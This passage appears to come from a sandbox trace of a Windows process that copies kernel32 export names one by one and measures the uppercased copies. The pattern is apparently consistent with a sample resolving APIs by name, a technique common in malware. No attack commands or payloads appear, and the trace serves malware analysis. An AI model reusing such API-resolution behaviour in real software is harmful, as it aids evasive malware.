lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0080.576] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0080.576] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0080.576] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0080.576] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0080.576] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0080.576] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0080.576] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0080.576] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0080.576] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0080.576] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0080.576] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0080.576] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0080.576] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0080.576] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0080.576] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0080.576] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0080.576] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0080.576] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0080.576] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0080.576] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0080.576] lstrlenA (lpString="CANCELIO") returned 8 [0080.576] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0080.576] lstrlenA (lpString="CANCELIOEX") returned 10 [0080.576] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0080.576] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0080.576] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0080.576] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0080.576] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0080.576] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0080.576] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0080.576] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0080.576] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0080.576] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0080.576] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0080.576] lstrlenA (lpString="CHECKELEVATION") returned 14 [0080.576] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0080.577] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0080.577] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0080.577] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0080.577] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0080.577] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0080.577] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0080.577] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0080.577] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0080.577] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0080.577] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0080.577] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0080.577] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0080.577] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0080.577] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0080.577] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0080.577] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0080.577] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0080.577] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0080.577] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0080.577] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0080.577] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0080.577] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0080.577] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0080.577] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0080.577] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0080.577] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0080.577] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0080.577] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0080.577] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0080.577] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0080.577] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0080.577] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0080.577] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0080.577] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0080.577] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0080.577] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0080.577] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0080.578] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0080.578] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0080.578] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0080.578] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0080.578] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0080.578] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0080.578] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0080.578] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0080.578] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0080.578] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0080.578] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0080.578] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0080.578] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0080.578] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0080.578] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0080.578] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0080.578] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0080.578] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0080.578] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0080.578] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0080.578] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0080.578] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0080.578] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0080.578] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0080.578] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0080.578] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0080.578] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0080.578] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0080.578] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0080.578] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0080.578] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0080.578] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0080.578] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0080.578] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0080.578] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0080.578] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0080.579] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0080.579] lstrlenA (lpString="COPYCONTEXT") returned 11 [0080.579] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0080.579] lstrlenA (lpString="COPYFILEA") returned 9 [0080.579] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0080.579] lstrlenA (lpString="COPYFILEEXA") returned 11 [0080.579] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0080.579] lstrlenA (lpString="COPYFILEEXW") returned 11 [0080.579] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0080.579] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0080.579] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0080.579] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0080.579] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0080.579] lstrlenA (lpString="COPYFILEW") returned 9 [0080.579] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0080.579] lstrlenA (lpString="COPYLZFILE") returned 10 [0080.579] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0080.579] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0080.579] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0080.579] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0080.579] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0080.579] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0080.579] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0080.579] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0080.579] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0080.579] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0080.579] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0080.579] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0080.579] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0080.579] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0080.579] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0080.579] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0080.579] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0080.579] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0080.579] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0080.579] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0080.579] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0080.580] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0080.580] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0080.580] lstrlenA (lpString="CREATEEVENTA") returned 12 [0080.580] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0080.580] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0080.580] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0080.580] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0080.580] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0080.580] lstrlenA (lpString="CREATEEVENTW") returned 12 [0080.580] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0080.580] lstrlenA (lpString="CREATEFIBER") returned 11 [0080.580] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0080.580] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0080.580] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0080.580] lstrlenA (lpString="CREATEFILEA") returned 11 [0080.580] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0080.580] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0080.580] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0080.580] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0080.580] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0080.580] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0080.580] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0080.580] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0080.580] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0080.580] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0080.580] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0080.580] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0080.580] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0080.580] lstrlenA (lpString="CREATEFILEW") returned 11 [0080.580] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0080.580] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0080.580] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0080.580] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0080.580] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0080.580] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0080.580] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0080.581] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0080.581] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0080.581] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0080.581] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0080.581] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0080.581] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0080.581] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0080.581] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0080.581] lstrlenA (lpString="CREATEJOBSET") returned 12 [0080.581] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0080.581] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0080.581] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0080.581] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0080.581] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0080.581] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0080.581] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0080.581] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0080.581] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0080.581] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0080.581] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0080.581] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0080.581] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0080.581] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0080.581] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0080.581] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0080.581] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0080.581] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0080.581] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0080.581] lstrlenA (lpString="CREATEPIPE") returned 10 [0080.581] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0080.581] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0080.581] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0080.581] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0080.581] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0080.581] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0080.581] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0080.582] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0080.582] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0080.582] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0080.582] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0080.582] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0080.582] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0080.582] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0080.582] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0080.582] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0080.582] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0080.582] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0080.582] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0080.582] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0080.582] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0080.582] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0080.582] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0080.582] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0080.582] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0080.582] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0080.582] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0080.582] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0080.582] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0080.582] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0080.582] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0080.582] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0080.582] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0080.582] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0080.582] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0080.582] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0080.582] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0080.582] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0080.582] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0080.582] lstrlenA (lpString="CREATETHREAD") returned 12 [0080.582] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0080.582] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0080.582] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0080.583] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0080.583] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0080.583] lstrlenA (lpString="CREATETHREADPOOLIO") 